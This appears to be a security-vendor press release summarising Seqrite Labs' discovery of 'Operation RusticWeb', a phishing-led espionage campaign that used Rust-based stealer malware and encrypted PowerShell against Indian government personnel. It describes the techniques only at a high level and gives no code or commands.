Seqrite has unearthed ‘Operation RusticWeb’, a highly sophisticated cyber-espionage campaign, meticulously orchestrated to target various personnel within the Indian government. While uncovering this cyber-espionage campaign, the researchers at Seqrite Labs, the cybersecurity research and response division of Quick Heal and India’s largest malware detection facility, have highlighted an alarming evolution in the tactics employed by threat actors.
Since October 2023, Seqrite Labs' APT-Team has been diligently investigating the intricacies of Operation RusticWeb, uncovering a multifaceted approach that combines cutting-edge techniques and new-age programming languages. The campaign employs Rust-based malware and encrypted PowerShell commands, demonstrating a strategic shift towards more advanced and evasive methods of exfiltrating confidential documents.
The campaign is initiated with a phishing campaign, targeting government personnel. Threat actors have exploited both, compromised and fake domains, to host malicious payloads and decoy files, ranging from IPR forms to fake domains mimicking prestigious organizations like the Army Welfare Education Society (AWES). The decoy files, designed to lure victims into the malicious web, include forms related to Defence Services Officers Provident Fund and presentations on initiatives with the Ministry of Defence.
Operation RusticWeb uses Rust-based payloads and encrypted PowerShell commands. The threat actors exfiltrate sensitive documents via a web-based service engine, adding a layer of sophistication to their cyber-espionage tactics. The first observed infection chain heavily relied on Rust-based payloads, with a malicious shortcut file triggering an elaborate sequence leading to the exfiltration of sensitive data. The second infection chain, observed in December, deployed maldocs using encrypted PowerShell commands, showcasing the threat actors' versatility and adaptability.
The final payload of Operation RusticWeb is a Rust-based malware that operates as a data stealer. This sophisticated malware not only steals files but also collects system information, ensuring an extensive reconnaissance capability. The threat actors employ an anonymous public file-sharing engine, OshiUpload, for data exfiltration, avoiding the conventional use of dedicated command-and-control servers.
Operation RusticWeb is a prime example of the departure of threat actors from conventional cyber-attack methodologies, and the adoption of newer programming languages such as Golang, Rust, and Nim, since they provide cross-compatibility and increase the difficulty of detection. The campaign draws parallels with Pakistan-linked APT groups, specifically Transparent Tribe (APT36) and SideCopy, underlining the possibility of a larger, orchestrated cyber-espionage effort.
In the wake of rapidly evolving cyber threats, Seqrite urges heightened caution and emphasizes the importance of implementing robust cybersecurity measures. The company remains committed to staying at the forefront of cybersecurity research, providing critical insights to safeguard individuals, organizations, and governments against evolving cyber threats